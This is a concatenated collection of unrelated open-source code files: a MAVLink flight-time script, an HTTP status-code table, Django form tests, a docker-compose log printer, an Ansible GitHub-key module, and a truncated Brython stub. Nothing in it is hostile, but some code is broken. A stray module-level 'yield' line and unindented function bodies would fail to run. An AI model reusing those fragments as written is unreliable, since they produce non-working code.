    (r'^robots\.txt$', direct_to_template,
        {'template': 'robots.txt', 'mimetype': 'text/plain'}),
)
| agpl-3.0 |
kuri-kustar/pixhawk_plotting_tools | scripts/mavflighttime.py | 1 | 3316 | #!/usr/bin/env python
'''
work out total flight time for a mavlink log
'''
import sys, time, os, glob
import os, sys
from math import *
from argparse import ArgumentParser
parser = ArgumentParser(description=__doc__)
parser.add_argument("--condition", default=None, help="condition for packets")
parser.add_argument("--groundspeed", type=float, default=3.0, help="groundspeed threshold")
parser.add_argument("logs", metavar="LOG", nargs="+")
args = parser.parse_args()
from pymavlink import mavutil
def distance_two(GPS_RAW1, GPS_RAW2):
    '''Great-circle distance in metres between two GPS messages.

    Handles three message flavours:
      * DataFlash GPS messages: Lat/Lon attributes, in degrees
      * MAVLink GPS_RAW_INT messages (detected via their 'cog' field):
        lat/lon attributes stored as integers in 1e7 degrees
      * MAVLink GPS_RAW messages: lat/lon attributes, in degrees
    Uses the haversine formula with a 6371 km mean Earth radius.
    '''
    if hasattr(GPS_RAW1, 'Lat'):
        lat1 = radians(GPS_RAW1.Lat)
        lat2 = radians(GPS_RAW2.Lat)
        lon1 = radians(GPS_RAW1.Lon)
        lon2 = radians(GPS_RAW2.Lon)
    elif hasattr(GPS_RAW1, 'cog'):
        # BUGFIX: GPS_RAW_INT messages only carry lower-case .lat/.lon
        # (scaled by 1e7); the previous code read the non-existent
        # .Lat/.Lon attributes here and raised AttributeError.
        lat1 = radians(GPS_RAW1.lat * 1.0e-7)
        lat2 = radians(GPS_RAW2.lat * 1.0e-7)
        lon1 = radians(GPS_RAW1.lon * 1.0e-7)
        lon2 = radians(GPS_RAW2.lon * 1.0e-7)
    else:
        lat1 = radians(GPS_RAW1.lat)
        lat2 = radians(GPS_RAW2.lat)
        lon1 = radians(GPS_RAW1.lon)
        lon2 = radians(GPS_RAW2.lon)
    dLat = lat2 - lat1
    dLon = lon2 - lon1
    # Haversine formula.
    a = sin(0.5*dLat)**2 + sin(0.5*dLon)**2 * cos(lat1) * cos(lat2)
    c = 2.0 * atan2(sqrt(a), sqrt(1.0-a))
    return 6371 * 1000 * c
def flight_time(logfile):
    '''work out flight time for a log file

    Returns a (seconds_in_air, distance_metres) tuple.  A flight starts
    when groundspeed first exceeds args.groundspeed with a 3D GPS fix and
    ends when it drops back below that threshold (or the log ends).

    Fixes over the previous revision:
      * the function ignored its `logfile` parameter and read the module
        global `filename` (the glob *pattern*, not the matched file);
      * Python-2 `print` statements made the file a SyntaxError on py3;
      * `print "Status:" + status` concatenated str + int (TypeError) and
        has been removed as leftover debug output;
      * minute arithmetic now uses integer division (`//`).
    '''
    print("Processing log %s" % logfile)
    mlog = mavutil.mavlink_connection(logfile)
    in_air = False
    start_time = 0.0
    total_time = 0.0
    total_dist = 0.0
    t = None
    last_msg = None
    while True:
        m = mlog.recv_match(type=['GPS', 'GPS_RAW_INT'], condition=args.condition)
        if m is None:
            # End of log: close out a flight still in progress.
            if in_air:
                total_time += time.mktime(t) - start_time
            if total_time > 0:
                print("Flight time : %u:%02u" % (int(total_time) // 60, int(total_time) % 60))
            return (total_time, total_dist)
        if m.get_type() == 'GPS_RAW_INT':
            groundspeed = m.vel * 0.01  # cm/s -> m/s
            status = m.fix_type
        else:
            groundspeed = m.VelE
            status = m.Fix
        if status < 3:
            # Need a 3D fix before trusting position/speed.
            continue
        t = time.localtime(m._timestamp)
        if groundspeed > args.groundspeed and not in_air:
            print("In air at %s (percent %.0f%% groundspeed %.1f)" % (time.asctime(t), mlog.percent, groundspeed))
            in_air = True
            start_time = time.mktime(t)
        elif groundspeed < args.groundspeed and in_air:
            print("On ground at %s (percent %.1f%% groundspeed %.1f time=%.1f seconds)" % (
                time.asctime(t), mlog.percent, groundspeed, time.mktime(t) - start_time))
            in_air = False
            total_time += time.mktime(t) - start_time
        if last_msg is not None:
            total_dist += distance_two(last_msg, m)
        last_msg = m
    return (total_time, total_dist)
# Accumulate flight time and distance over every log named on the command
# line; each argument may be a glob pattern.
total_time = 0.0
total_dist = 0.0
for filename in args.logs:
    for f in glob.glob(filename):
        (ftime, fdist) = flight_time(f)
        total_time += ftime
        total_dist += fdist
# Integer division keeps the %u formatting correct on Python 3 as well.
print("Total time in air: %u:%02u" % (int(total_time) // 60, int(total_time) % 60))
print("Total distance travelled: %.1f meters" % total_dist)
| lgpl-3.0 |
MayOneUS/pledgeservice | lib/mailchimp/requests/status_codes.py | 695 | 3136 | # -*- coding: utf-8 -*-
from .structures import LookupDict
# Map of HTTP status code -> tuple of attribute aliases.  Every alias (plus
# its upper-case form, unless it begins with a backslash) becomes an
# attribute on the `codes` lookup object built just below this table.
_codes = {

    # Informational.
    100: ('continue',),
    101: ('switching_protocols',),
    102: ('processing',),
    103: ('checkpoint',),
    122: ('uri_too_long', 'request_uri_too_long'),
    200: ('ok', 'okay', 'all_ok', 'all_okay', 'all_good', '\\o/', '✓'),
    201: ('created',),
    202: ('accepted',),
    203: ('non_authoritative_info', 'non_authoritative_information'),
    204: ('no_content',),
    205: ('reset_content', 'reset'),
    206: ('partial_content', 'partial'),
    207: ('multi_status', 'multiple_status', 'multi_stati', 'multiple_stati'),
    208: ('already_reported',),
    226: ('im_used',),

    # Redirection.
    300: ('multiple_choices',),
    301: ('moved_permanently', 'moved', '\\o-'),
    302: ('found',),
    303: ('see_other', 'other'),
    304: ('not_modified',),
    305: ('use_proxy',),
    306: ('switch_proxy',),
    307: ('temporary_redirect', 'temporary_moved', 'temporary'),
    308: ('resume_incomplete', 'resume'),

    # Client Error.
    400: ('bad_request', 'bad'),
    401: ('unauthorized',),
    402: ('payment_required', 'payment'),
    403: ('forbidden',),
    404: ('not_found', '-o-'),
    405: ('method_not_allowed', 'not_allowed'),
    406: ('not_acceptable',),
    407: ('proxy_authentication_required', 'proxy_auth', 'proxy_authentication'),
    408: ('request_timeout', 'timeout'),
    409: ('conflict',),
    410: ('gone',),
    411: ('length_required',),
    412: ('precondition_failed', 'precondition'),
    413: ('request_entity_too_large',),
    414: ('request_uri_too_large',),
    415: ('unsupported_media_type', 'unsupported_media', 'media_type'),
    416: ('requested_range_not_satisfiable', 'requested_range', 'range_not_satisfiable'),
    417: ('expectation_failed',),
    418: ('im_a_teapot', 'teapot', 'i_am_a_teapot'),
    422: ('unprocessable_entity', 'unprocessable'),
    423: ('locked',),
    424: ('failed_dependency', 'dependency'),
    425: ('unordered_collection', 'unordered'),
    426: ('upgrade_required', 'upgrade'),
    428: ('precondition_required', 'precondition'),
    429: ('too_many_requests', 'too_many'),
    431: ('header_fields_too_large', 'fields_too_large'),
    444: ('no_response', 'none'),
    449: ('retry_with', 'retry'),
    450: ('blocked_by_windows_parental_controls', 'parental_controls'),
    451: ('unavailable_for_legal_reasons', 'legal_reasons'),
    499: ('client_closed_request',),

    # Server Error.
    500: ('internal_server_error', 'server_error', '/o\\', '✗'),
    501: ('not_implemented',),
    502: ('bad_gateway',),
    503: ('service_unavailable', 'unavailable'),
    504: ('gateway_timeout',),
    505: ('http_version_not_supported', 'http_version'),
    506: ('variant_also_negotiates',),
    507: ('insufficient_storage',),
    509: ('bandwidth_limit_exceeded', 'bandwidth'),
    510: ('not_extended',),
}
# Build the attribute-style lookup object from the table above.
codes = LookupDict(name='status_codes')

# _codes is not mutated during iteration, so the defensive list() copy the
# previous revision made around .items() was an unnecessary materialization.
for code, titles in _codes.items():
    for title in titles:
        setattr(codes, title, code)
        if not title.startswith('\\'):
            # Backslash-prefixed art aliases ('\\o/', ...) get no upper-case form.
            setattr(codes, title.upper(), code)
| apache-2.0 |
uclouvain/osis_louvain | base/tests/forms/test_edition_form.py | 1 | 16685 | ##############################################################################
#
# OSIS stands for Open Student Information System. It's an application
# designed to manage the core business of higher education institutions,
# such as universities, faculties, institutes and professional schools.
# The core business involves the administration of students, teachers,
# courses, programs and so on.
#
# Copyright (C) 2015-2018 Université catholique de Louvain (http://www.uclouvain.be)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# A copy of this license - GNU General Public License - is available
# at the root of the source code of this program. If not,
# see http://www.gnu.org/licenses/.
#
##############################################################################
from django.contrib.auth.models import Group
from django.test import TestCase, RequestFactory
from django.utils.translation import gettext
from base.business.learning_unit_year_with_context import get_with_context
from base.forms.learning_unit.edition_volume import VolumeEditionForm, VolumeEditionBaseFormset, \
VolumeEditionFormsetContainer
from base.models.person import CENTRAL_MANAGER_GROUP, FACULTY_MANAGER_GROUP
from base.tests.factories.business.learning_units import GenerateContainer, GenerateAcademicYear
from base.tests.factories.learning_component_year import LearningComponentYearFactory
from base.tests.factories.person import PersonFactory
class TestVolumeEditionForm(TestCase):
    """Unit tests for VolumeEditionForm validation of component volumes."""
    def setUp(self):
        self.start_year = 2010
        self.end_year = 2020
        self.generated_ac_years = GenerateAcademicYear(self.start_year, self.end_year)
        self.generated_container = GenerateContainer(self.start_year, self.end_year)
        self.first_learning_unit_year = self.generated_container.generated_container_years[0].learning_unit_year_full
        self.learning_unit_with_context = get_with_context(
            learning_container_year_id=self.first_learning_unit_year.learning_container_year)[0]
    def test_get_volume_form(self):
        # Unbound form: initial data must round-trip unchanged.
        for component, component_values in self.learning_unit_with_context.components.items():
            component_values = VolumeEditionBaseFormset._clean_component_keys(component_values)
            form = VolumeEditionForm(learning_unit_year=self.learning_unit_with_context,
                                     initial=component_values,
                                     component=component,
                                     entities=self.learning_unit_with_context.entities)
            self.assertEqual(form.initial, component_values)
    def test_post_volume_form(self):
        for component, component_values in self.learning_unit_with_context.components.items():
            component_values = VolumeEditionBaseFormset._clean_component_keys(component_values)
            form = VolumeEditionForm(
                data=_get_valid_data(),
                learning_unit_year=self.learning_unit_with_context,
                initial=component_values,
                component=component,
                entities=self.learning_unit_with_context.entities)
            self.assertTrue(form.is_valid())
    def test_post_volume_form_empty_field(self):
        # A missing required volume field must invalidate the form.
        for component, component_values in self.learning_unit_with_context.components.items():
            component_values = VolumeEditionBaseFormset._clean_component_keys(component_values)
            form = VolumeEditionForm(
                data=_get_wrong_data_empty_field(),
                learning_unit_year=self.learning_unit_with_context,
                initial=component_values,
                component=component,
                entities=self.learning_unit_with_context.entities)
            self.assertFalse(form.is_valid())
    def test_post_volume_form_wrong_volume_total(self):
        for component, component_values in self.learning_unit_with_context.components.items():
            component_values = VolumeEditionBaseFormset._clean_component_keys(component_values)
            form = VolumeEditionForm(
                data=_get_wrong_data_volume_tot(),
                learning_unit_year=self.learning_unit_with_context,
                initial=component_values,
                component=component,
                entities=self.learning_unit_with_context.entities)
            self.assertTrue(form.is_valid())  # Accept that vol_q1 + vol_q2 is not equal to vol_tot
    def test_post_volume_form_wrong_volume_tot_requirement(self):
        for component, component_values in self.learning_unit_with_context.components.items():
            component_values = VolumeEditionBaseFormset._clean_component_keys(component_values)
            form = VolumeEditionForm(
                data=_get_wrong_data_volume_tot(),
                learning_unit_year=self.learning_unit_with_context,
                initial=component_values,
                component=component,
                entities=self.learning_unit_with_context.entities)
            self.assertTrue(form.is_valid())  # Accept that vol_tot * cp is not equal to vol_global
    def test_post_volume_form_wrong_vol_req_entity(self):
        for component, component_values in self.learning_unit_with_context.components.items():
            component_values = VolumeEditionBaseFormset._clean_component_keys(component_values)
            form = VolumeEditionForm(
                data=_get_wrong_data_vol_req_entity(),
                learning_unit_year=self.learning_unit_with_context,
                initial=component_values,
                component=component,
                entities=self.learning_unit_with_context.entities)
            self.assertTrue(form.is_valid())  # Accept that vol_global is not equal to sum of volumes of entities
    def test_post_volume_form_partim_q1(self):
        for component, component_values in self.learning_unit_with_context.components.items():
            component_values = VolumeEditionBaseFormset._clean_component_keys(component_values)
            form = VolumeEditionForm(
                data=_get_valid_partim_data_alter(),
                learning_unit_year=self.learning_unit_with_context,
                initial=component_values,
                component=component,
                entities=self.learning_unit_with_context.entities)
            self.assertTrue(form.is_valid())
    def test_get_entity_fields(self):
        # One field per entity: requirement + two additional requirement entities.
        for component, component_values in self.learning_unit_with_context.components.items():
            component_values = VolumeEditionBaseFormset._clean_component_keys(component_values)
            form = VolumeEditionForm(
                data=_get_valid_partim_data_alter(),
                learning_unit_year=self.learning_unit_with_context,
                initial=component_values,
                component=component,
                entities=self.learning_unit_with_context.entities)
            actual_entity_fields = form.get_entity_fields()
            self.assertEqual(len(actual_entity_fields), 3)
def _get_wrong_data_empty_field():
    """Valid form data with the required ``volume_total`` field blanked out."""
    return dict(_get_valid_data(), volume_total='')
def _get_wrong_data_volume_tot():
    """Valid form data whose ``volume_total`` disagrees with vol_q1 + vol_q2."""
    return dict(_get_valid_data(), volume_total=3)
def _get_wrong_data_vol_req_entity():
    """Valid form data where the entity volumes no longer sum to the global total."""
    return dict(_get_valid_data(), volume_additional_requirement_entity_1=2)
def _get_valid_data():
return {
'volume_total': 2,
'volume_q1': 0,
'volume_q2': 2,
'planned_classes': 1,
'volume_requirement_entity': 1,
'volume_additional_requirement_entity_1': 0.5,
'volume_additional_requirement_entity_2': 0.5,
'volume_total_requirement_entities': 2
}
def _get_valid_partim_data():
return {
'volume_total': 1,
'volume_q1': 0,
'volume_q2': 1,
'planned_classes': 1,
'volume_requirement_entity': 0.5,
'volume_additional_requirement_entity_1': 0.25,
'volume_additional_requirement_entity_2': 0.25,
'volume_total_requirement_entities': 1
}
def _get_valid_partim_data_alter():
return {
'volume_total': 4,
'volume_q1': 1,
'volume_q2': 3,
'planned_classes': 2,
'volume_requirement_entity': 6,
'volume_additional_requirement_entity_1': 1,
'volume_additional_requirement_entity_2': 1,
'volume_total_requirement_entities': 8
}
class TestVolumeEditionFormsetContainer(TestCase):
    """Tests for VolumeEditionFormsetContainer: one formset per learning unit
    (full + partim), with fields disabled according to the manager's role."""
    def setUp(self):
        self.start_year = 2010
        self.end_year = 2020
        self.generated_ac_years = GenerateAcademicYear(self.start_year, self.end_year)
        self.generated_container = GenerateContainer(self.start_year, self.end_year)
        self.generated_container_year = self.generated_container.generated_container_years[0]
        self.learning_container_year = self.generated_container.generated_container_years[0].learning_container_year
        self.learning_units_with_context = get_with_context(
            learning_container_year_id=self.learning_container_year)
        self.learning_unit_year_full = self.generated_container_year.learning_unit_year_full
        self.learning_unit_year_partim = self.generated_container_year.learning_unit_year_partim
        self.central_manager = PersonFactory()
        self.central_manager.user.groups.add(Group.objects.get(name=CENTRAL_MANAGER_GROUP))
        self.faculty_manager = PersonFactory()
        self.faculty_manager.user.groups.add(Group.objects.get(name=FACULTY_MANAGER_GROUP))
    def test_get_volume_edition_formset_container(self):
        # GET: one formset per learning unit year, two forms each.
        request_factory = RequestFactory()
        volume_edition_formset_container = VolumeEditionFormsetContainer(request_factory.get(None),
                                                                         self.learning_units_with_context,
                                                                         self.central_manager)
        self.assertEqual(len(volume_edition_formset_container.formsets), 2)
        self.assertCountEqual(list(volume_edition_formset_container.formsets.keys()),
                              [self.learning_unit_year_full,
                               self.learning_unit_year_partim])
        first_formset = volume_edition_formset_container.formsets[self.learning_unit_year_full]
        self.assertEqual(len(first_formset.forms), 2)
        self.assertEqual(first_formset.forms[0].learning_unit_year,
                         self.learning_unit_year_full)
    def test_post_volume_edition_formset_container(self):
        # POST with consistent full + partim data validates and saves.
        request_factory = RequestFactory()
        data_forms = get_valid_formset_data(self.learning_unit_year_full.acronym)
        data_forms.update(get_valid_formset_data(self.learning_unit_year_partim.acronym, is_partim=True))
        data_forms.update({'postponement': 1})
        volume_edition_formset_container = VolumeEditionFormsetContainer(
            request_factory.post(None, data=data_forms),
            self.learning_units_with_context, self.central_manager)
        self.assertTrue(volume_edition_formset_container.is_valid())
        volume_edition_formset_container.save()
    def test_post_volume_edition_formset_container_wrong_vol_tot_full_must_be_greater_than_partim(self):
        request_factory = RequestFactory()
        data_forms = get_valid_formset_data(self.learning_unit_year_full.acronym)
        data_forms.update(get_valid_formset_data(self.learning_unit_year_partim.acronym))
        data_forms.update({'LDROI1200A-0-volume_total': 3})
        data_forms.update({'LDROI1200A-0-volume_q2': 3})
        data_forms.update({'LDROI1200A-0-volume_requirement_entity': 2})
        data_forms.update({'LDROI1200A-0-volume_total_requirement_entities': 3})
        volume_edition_formset_container = VolumeEditionFormsetContainer(
            request_factory.post(None, data=data_forms),
            self.learning_units_with_context, self.central_manager)
        self.assertTrue(volume_edition_formset_container.is_valid())  # Volumes of partims can be greater than parent's
    def test_post_volume_edition_formset_container__vol_tot_full_can_be_equal_to_partim(self):
        request_factory = RequestFactory()
        data_forms = get_valid_formset_data(self.learning_unit_year_full.acronym)
        data_forms.update(get_valid_formset_data(self.learning_unit_year_partim.acronym))
        volume_edition_formset_container = VolumeEditionFormsetContainer(
            request_factory.post(None, data=data_forms),
            self.learning_units_with_context, self.central_manager)
        self.assertTrue(volume_edition_formset_container.is_valid())
    def test_get_volume_edition_formset_container_as_faculty_manager(self):
        # Faculty managers only get their whitelisted fields enabled on the
        # full UE; all partim fields stay editable.
        request_factory = RequestFactory()
        volume_edition_formset_container = VolumeEditionFormsetContainer(request_factory.get(None),
                                                                         self.learning_units_with_context,
                                                                         self.faculty_manager)
        self.assertEqual(len(volume_edition_formset_container.formsets), 2)
        self.assertCountEqual(list(volume_edition_formset_container.formsets.keys()),
                              [self.learning_unit_year_full,
                               self.learning_unit_year_partim])
        full_formset = volume_edition_formset_container.formsets[self.learning_unit_year_full]
        first_form = full_formset.forms[0]
        self.assertEqual(len(full_formset.forms), 2)
        self.assertEqual(first_form.learning_unit_year, self.learning_unit_year_full)
        fields = first_form.fields
        for key, field in fields.items():
            if key in first_form._faculty_manager_fields:
                self.assertFalse(field.disabled)
            else:
                self.assertTrue(field.disabled)
        partim_formset = volume_edition_formset_container.formsets[self.learning_unit_year_partim]
        first_form = partim_formset.forms[0]
        self.assertEqual(len(partim_formset.forms), 2)
        self.assertEqual(first_form.learning_unit_year, self.learning_unit_year_partim)
        fields = first_form.fields
        for key, field in fields.items():
            self.assertFalse(field.disabled)
    def test_volume_edition_as_faculty_manager(self):
        # Faculty managers may only zero out one of the two partial volumes,
        # and may not set a previously non-zero volume to 0.
        component = LearningComponentYearFactory()
        form = VolumeEditionForm(
            data={'volume_q1': 12, 'volume_q2': 12},
            component=component,
            learning_unit_year=self.learning_unit_year_full,
            is_faculty_manager=True, initial={'volume_q1': 0, 'volume_q2': 12}
        )
        form.is_valid()
        self.assertEqual(form.errors['volume_q2'], [gettext('One of the partial volumes must have a value to 0.')])
        self.assertEqual(form.errors['volume_q1'], [gettext('One of the partial volumes must have a value to 0.')])
        form = VolumeEditionForm(
            data={'volume_q1': 0, 'volume_q2': 12},
            component=component,
            learning_unit_year=self.learning_unit_year_full,
            is_faculty_manager=True, initial={'volume_q1': 12, 'volume_q2': 12}
        )
        form.is_valid()
        self.assertEqual(form.errors['volume_q1'], [gettext('The volume can not be set to 0.')])
        form = VolumeEditionForm(
            data={'volume_q1': 12, 'volume_q2': 0},
            component=component,
            learning_unit_year=self.learning_unit_year_full,
            is_faculty_manager=True, initial={'volume_q1': 12, 'volume_q2': 12}
        )
        form.is_valid()
        self.assertEqual(form.errors['volume_q2'], [gettext('The volume can not be set to 0.')])
def get_valid_formset_data(prefix, is_partim=False):
    """Build POST data for a two-form volume formset.

    Each volume key is duplicated for form indices 0 and 1, the Django
    management-form keys are added, and every key is namespaced by *prefix*.
    """
    base = _get_valid_partim_data() if is_partim else _get_valid_data()
    form_data = {}
    for form_index in (0, 1):
        for key, value in base.items():
            form_data['{}-{}'.format(form_index, key)] = value
    form_data['INITIAL_FORMS'] = '0'
    form_data['MAX_NUM_FORMS'] = '1000'
    form_data['MIN_NUM_FORMS'] = '0'
    form_data['TOTAL_FORMS'] = '2'
    return {'{}-{}'.format(prefix, key): value for key, value in form_data.items()}
| agpl-3.0 |
ph-One/compose | compose/cli/log_printer.py | 14 | 2705 | from __future__ import absolute_import
from __future__ import unicode_literals
import sys
from itertools import cycle
from . import colors
from .multiplexer import Multiplexer
from .utils import split_buffer
from compose import utils
class LogPrinter(object):
    """Print logs from many containers to a single output stream."""
    def __init__(self, containers, output=sys.stdout, monochrome=False):
        self.containers = containers
        self.output = utils.get_output_stream(output)
        # When True, container name prefixes are not colorized.
        self.monochrome = monochrome
    def run(self):
        """Stream interleaved, prefixed log lines until all containers exit."""
        if not self.containers:
            return
        prefix_width = max_name_width(self.containers)
        generators = list(self._make_log_generators(self.monochrome, prefix_width))
        # Multiplexer interleaves lines from all generators as they arrive.
        for line in Multiplexer(generators).loop():
            self.output.write(line)
    def _make_log_generators(self, monochrome, prefix_width):
        # Yield one log generator per container, each given a name prefix
        # padded to prefix_width and a color function (identity if monochrome).
        def no_color(text):
            return text
        if monochrome:
            color_funcs = cycle([no_color])
        else:
            color_funcs = cycle(colors.rainbow())
        for color_func, container in zip(color_funcs, self.containers):
            generator_func = get_log_generator(container)
            prefix = color_func(build_log_prefix(container, prefix_width))
            yield generator_func(container, prefix, color_func)
def build_log_prefix(container, prefix_width):
    """Return the container's display name padded to *prefix_width*, plus separator."""
    padded_name = container.name_without_project.ljust(prefix_width)
    return '{0} | '.format(padded_name)
def max_name_width(containers):
    """Width of the longest container name, used to align log prefixes:

        db_1  | Listening
        web_1 | Listening
    """
    longest = max((c.name_without_project for c in containers), key=len)
    return len(longest)
def get_log_generator(container):
    """Pick the generator appropriate for the container's log driver."""
    return build_log_generator if container.has_api_logs else build_no_log_generator
def build_no_log_generator(container, prefix, color_func):
    """Yield a warning that the log driver exposes no logs, then block until exit."""
    warning = "{} WARNING: no logs are available with the '{}' log driver\n".format(
        prefix,
        container.log_driver)
    yield warning
    yield color_func(wait_on_exit(container))
def build_log_generator(container, prefix, color_func):
    """Yield each prefixed log line from the container, then its exit status."""
    # Attach to container before log printer starts running
    log_stream = container.attach(stdout=True, stderr=True, stream=True, logs=True)
    for line in split_buffer(log_stream, u'\n'):
        yield prefix + line
    yield color_func(wait_on_exit(container))
yield color_func(wait_on_exit(container))
def wait_on_exit(container):
    """Block until *container* stops and return a one-line exit summary."""
    status = container.wait()
    return "{0} exited with code {1}\n".format(container.name, status)
| apache-2.0 |
Inspq/ansible | lib/ansible/modules/source_control/github_key.py | 70 | 7765 | #!/usr/bin/python
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
module: github_key
short_description: Manage GitHub access keys.
description:
- Creates, removes, or updates GitHub access keys.
version_added: "2.2"
options:
token:
description:
- GitHub Access Token with permission to list and create public keys.
required: true
name:
description:
- SSH key name
required: true
pubkey:
description:
- SSH public key value. Required when C(state=present).
required: false
default: none
state:
description:
- Whether to remove a key, ensure that it exists, or update its value.
choices: ['present', 'absent']
default: 'present'
required: false
force:
description:
- The default is C(yes), which will replace the existing remote key
if it's different than C(pubkey). If C(no), the key will only be
set if no key with the given C(name) exists.
required: false
choices: ['yes', 'no']
default: 'yes'
author: Robert Estelle (@erydo)
'''
RETURN = '''
deleted_keys:
description: An array of key objects that were deleted. Only present on state=absent
type: list
returned: When state=absent
sample: [{'id': 0, 'key': 'BASE64 encoded key', 'url': 'http://example.com/github key', 'created_at': 'YYYY-MM-DDTHH:MM:SZ', 'read_only': False}]
matching_keys:
description: An array of keys matching the specified name. Only present on state=present
type: list
returned: When state=present
sample: [{'id': 0, 'key': 'BASE64 encoded key', 'url': 'http://example.com/github key', 'created_at': 'YYYY-MM-DDTHH:MM:SZ', 'read_only': False}]
key:
description: Metadata about the key just created. Only present on state=present
type: dict
returned: success
sample: {'id': 0, 'key': 'BASE64 encoded key', 'url': 'http://example.com/github key', 'created_at': 'YYYY-MM-DDTHH:MM:SZ', 'read_only': False}
'''
EXAMPLES = '''
- name: Read SSH public key to authorize
shell: cat /home/foo/.ssh/id_rsa.pub
register: ssh_pub_key
- name: Authorize key with GitHub
local_action:
module: github_key
name: Access Key for Some Machine
token: '{{ github_access_token }}'
pubkey: '{{ ssh_pub_key.stdout }}'
'''
import sys # noqa
import json
import re
API_BASE = 'https://api.github.com'
class GitHubResponse(object):
    """Thin wrapper around a urllib response returned by ``fetch_url``."""

    def __init__(self, response, info):
        # Read the body eagerly; ``info`` is the headers/status dict that
        # fetch_url returns alongside the response object.
        self.content = response.read()
        self.info = info

    def json(self):
        """Decode the response body as JSON."""
        return json.loads(self.content)

    def links(self):
        """Parse the RFC 5988 ``Link`` header into a rel -> url mapping.

        Used to follow GitHub's pagination (``rel="next"`` etc.).  Returns
        an empty dict when no Link header is present.
        """
        links = {}
        if 'link' in self.info:
            # BUGFIX: was `re.info['link']` (the `re` module has no `info`
            # attribute, so this raised AttributeError whenever a Link
            # header was present and broke pagination).  The header lives
            # on the response info dict.
            link_header = self.info['link']
            matches = re.findall('<([^>]+)>; rel="([^"]+)"', link_header)
            for url, rel in matches:
                links[rel] = url
        return links
class GitHubSession(object):
    """Issues authenticated requests against the GitHub API."""

    def __init__(self, module, token):
        self.module = module
        self.token = token

    def request(self, method, url, data=None):
        """Send one API request and wrap the reply in a GitHubResponse.

        Any status outside the 2xx/3xx range aborts the module via
        ``fail_json``.
        """
        headers = {
            'Authorization': 'token %s' % self.token,
            'Content-Type': 'application/json',
            'Accept': 'application/vnd.github.v3+json',
        }
        response, info = fetch_url(
            self.module, url, method=method, data=data, headers=headers)
        status = info['status']
        if status < 200 or status >= 400:
            self.module.fail_json(
                msg=(" failed to send request %s to %s: %s"
                     % (method, url, info['msg'])))
        return GitHubResponse(response, info)
def get_all_keys(session):
    """Yield every public key on the authenticated user's account.

    Transparently walks GitHub's paginated ``/user/keys`` endpoint by
    following the ``next`` link until it runs out.
    """
    url = API_BASE + '/user/keys'
    while url:
        response = session.request('GET', url)
        for key in response.json():
            yield key
        url = response.links().get('next')
def create_key(session, name, pubkey, check_mode):
    """Register *pubkey* under *name* on the user's account.

    In check mode no request is made; a fake key record shaped like the
    API response is returned instead.
    """
    if check_mode:
        from datetime import datetime
        stamp = datetime.strftime(datetime.utcnow(), '%Y-%m-%dT%H:%M:%SZ')
        return {
            'id': 0,
            'key': pubkey,
            'title': name,
            'url': 'http://example.com/CHECK_MODE_GITHUB_KEY',
            'created_at': stamp,
            'read_only': False,
            'verified': False
        }
    payload = json.dumps({'title': name, 'key': pubkey})
    return session.request('POST', API_BASE + '/user/keys', data=payload).json()
def delete_keys(session, to_delete, check_mode):
    """Delete each key record in *to_delete*; no-op in check mode."""
    if check_mode:
        return
    for key in to_delete:
        url = '{0}/user/keys/{1}'.format(API_BASE, key['id'])
        session.request('DELETE', url)
def ensure_key_absent(session, name, check_mode):
    """Remove every key titled *name* and report what was deleted."""
    doomed = [k for k in get_all_keys(session) if k['title'] == name]
    delete_keys(session, doomed, check_mode=check_mode)
    return {'changed': bool(doomed),
            'deleted_keys': doomed}
def ensure_key_present(session, name, pubkey, force, check_mode):
    """Ensure a key titled *name* exists with value *pubkey*.

    With ``force`` a mismatching existing key is replaced; otherwise an
    existing key of the same name is left untouched.
    """
    matching_keys = [k for k in get_all_keys(session) if k['title'] == name]
    deleted_keys = []

    # Replace an out-of-date key only when forced.
    if force and matching_keys and matching_keys[0]['key'] != pubkey:
        delete_keys(session, matching_keys, check_mode=check_mode)
        deleted_keys, matching_keys = matching_keys, []

    if matching_keys:
        key = matching_keys[0]
    else:
        key = create_key(session, name, pubkey, check_mode=check_mode)

    return {
        'changed': bool(deleted_keys or not matching_keys),
        'deleted_keys': deleted_keys,
        'matching_keys': matching_keys,
        'key': key
    }
def main():
    """Entry point: parse module arguments and apply the requested state."""
    module = AnsibleModule(
        argument_spec={
            'token': {'required': True, 'no_log': True},
            'name': {'required': True},
            'pubkey': {},
            'state': {'choices': ['present', 'absent'], 'default': 'present'},
            'force': {'default': True, 'type': 'bool'},
        },
        supports_check_mode=True,
    )

    params = module.params
    token = params['token']
    name = params['name']
    state = params['state']
    force = params['force']
    pubkey = params.get('pubkey')

    if pubkey:
        # Keys consist of a protocol, the key data, and an optional comment.
        parts = pubkey.split(' ')
        if len(parts) < 2:
            module.fail_json(msg='"pubkey" parameter has an invalid format')
        # Strip out comment so we can compare to the keys GitHub returns.
        pubkey = ' '.join(parts[:2])
    elif state == 'present':
        module.fail_json(msg='"pubkey" is required when state=present')

    session = GitHubSession(module, token)
    if state == 'present':
        result = ensure_key_present(session, name, pubkey, force=force,
                                    check_mode=module.check_mode)
    elif state == 'absent':
        result = ensure_key_absent(session, name, check_mode=module.check_mode)

    module.exit_json(**result)
from ansible.module_utils.basic import * # noqa
from ansible.module_utils.urls import * # noqa
# Standard Ansible module entry point when executed directly.
if __name__ == '__main__':
    main()
| gpl-3.0 |
40223222/2015cd_midterm | static/Brython3.1.1-20150328-091302/Lib/browser/local_storage.py | 617 | 2786 | # local storage in browser
import sys
from javascript import JSObject
class __UnProvided():
    # Sentinel class: an instance marks an optional argument as "not
    # provided" (as opposed to an explicit None).
    # NOTE(review): referencing a module-level double-underscore name from
    # inside another class body is subject to Python private name mangling
    # (it becomes `_OtherClass__UnProvided`), which raises NameError under
    # CPython semantics -- confirm how Brython resolves this.
    pass
class LocalStorage():
